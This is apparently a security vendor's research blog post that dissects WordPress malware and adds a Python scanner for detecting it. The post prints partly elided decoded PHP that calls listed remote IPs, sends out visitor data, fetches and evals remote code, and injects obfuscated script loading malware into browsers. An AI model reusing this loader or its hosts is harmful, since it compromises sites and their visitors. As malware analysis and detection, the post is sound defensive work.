Research Blog

New Malware – Eval + GetMama + Encoded Javascript

We are seeing many WordPress sites on shared hosts getting compromised with encoded JavaScript malware. It has multiple levels of obfuscation, and this is how it starts:


1- ALL PHP files get an eval (base64_decode line of code added:

/*god_mode_on*/eval (base64_decode("ZXZhbC

2- That long piece of code, once executed, gets decoded to:

if (!function_exists(GetMama)){function opanki($buf){$god_mode = $_SERVER["good"];
[...]
olower($buf),$cnt_h); str_replace("<?xml"
[...]
 if (($cnt_h > 2)&&($cnt_x == 0)) {$buf = $god_mode . $buf;} return $buf; }
function GetMama(){$mother = "www.psite.net";return $mother;}
ob_start("opanki");$show = false;
function ahfudflfzdhfhs($pa){global $show; global $god_mode; $mama = GetMama();$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];}
if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];}
if (isset($_SERVER["HTTP_REFERER"])){$ref =
[...]
= urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}
$url = "http://" . $pa . "/opp.php?mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua;
if( function_exists("curl_init") ){$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = curl_exec($ch);} else {$ult = @file_get_contents($url);}
if (strpos($ult,"eval") !== false){$z = str_replace("eval","",$ult); eval($z); $show = true; return true;}
if (strpos($ult,"ebna") !== false){$z =
[...]
$god_mode = $z; $show = true; return true; $_SERVER["good"] = $god_mode; } else {return false;}}
$father[] = "146.185.254.245";$father[] = "31.184.242.103";$father[] = "91.196.216.148";$father[] = "91.196.216.49";
foreach($father as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}
if ($show === false){$script='<script>var _0x8ab7=["x31x34x36x2Ex31x3
[...]
x6Cx64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=d
[...]
);} ;</script>';  $god_mode = $script;} $_SERVER["good"] = $god_mode; }

3- Which adds the following to the browser of anyone visiting the compromised site:

<script>var _0x8ab7=["146.185.25
[...]
","appendChild"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8
[...]
var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>

And that code (once executed by the browser) is used to generate a remote javascript include to load malware from 146.185.254.245,, and


Very nasty piece of code and we are seeing hundreds (if not thousands) of sites with it.
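A defender-side check for the infection pattern in steps 1 and 2, as an added example that is not code from the original post: it walks a web root, flags PHP files carrying the /*god_mode_on*/ marker or an eval(base64_decode(...)) wrapper, and peels the nested layers by decoding only, never executing them (the ZXZhbC prefix shown in step 1 is base64 for "eval", so the first layer wraps another). The function names, the placeholder.invalid host and the sample files are constructed for illustration.

```python
import base64, os, re, tempfile

MARKER = "/*god_mode_on*/"                     # comment tag shown in step 1
INDICATORS = ("GetMama", "opanki", "opp.php")  # names visible in step 2
LAYER = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*([\"'])([A-Za-z0-9+/=\s]+)\1", re.I)

def peel(source, max_depth=10):
    """Unwrap nested eval(base64_decode("...")) layers by decoding only."""
    layers = [source]
    for _ in range(max_depth):
        match = LAYER.search(layers[-1])
        if not match:
            break
        try:
            raw = base64.b64decode(match.group(2))
        except ValueError:  # truncated or corrupt blob: stop peeling
            break
        layers.append(raw.decode("latin-1"))
    return layers

def scan_file(path):
    with open(path, encoding="latin-1") as fh:
        layers = peel(fh.read())
    hits = [i for i in INDICATORS if any(i in layer for layer in layers[1:])]
    return {"path": path, "marker": MARKER in layers[0],
            "depth": len(layers) - 1, "indicators": hits}

def scan_tree(root):
    findings = []  # only files carrying the marker or an encoded layer
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(".php"):
                result = scan_file(os.path.join(dirpath, name))
                if result["marker"] or result["depth"]:
                    findings.append(result)
    return findings

def build_sample_tree():
    """Constructed test data: a clean file and a file with an inert two-layer blob."""
    b64 = lambda s: base64.b64encode(s.encode()).decode()
    inner = 'function GetMama(){return "placeholder.invalid";}'
    outer = 'eval(base64_decode("%s"));' % b64(inner)
    root = tempfile.mkdtemp()
    samples = {"clean.php": '<?php echo "hello"; ?>\n',
               "index.php": '<?php /*god_mode_on*/eval (base64_decode("%s")); ?>\n' % b64(outer)}
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return root
```

Call scan_tree() on a copy of the site's document root; a finding with depth above zero and any of the listed indicators matches the sample in this post, while the marker alone is enough to warrant a manual look.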


If your site is compromised, sign up with us and we will fix it for you:


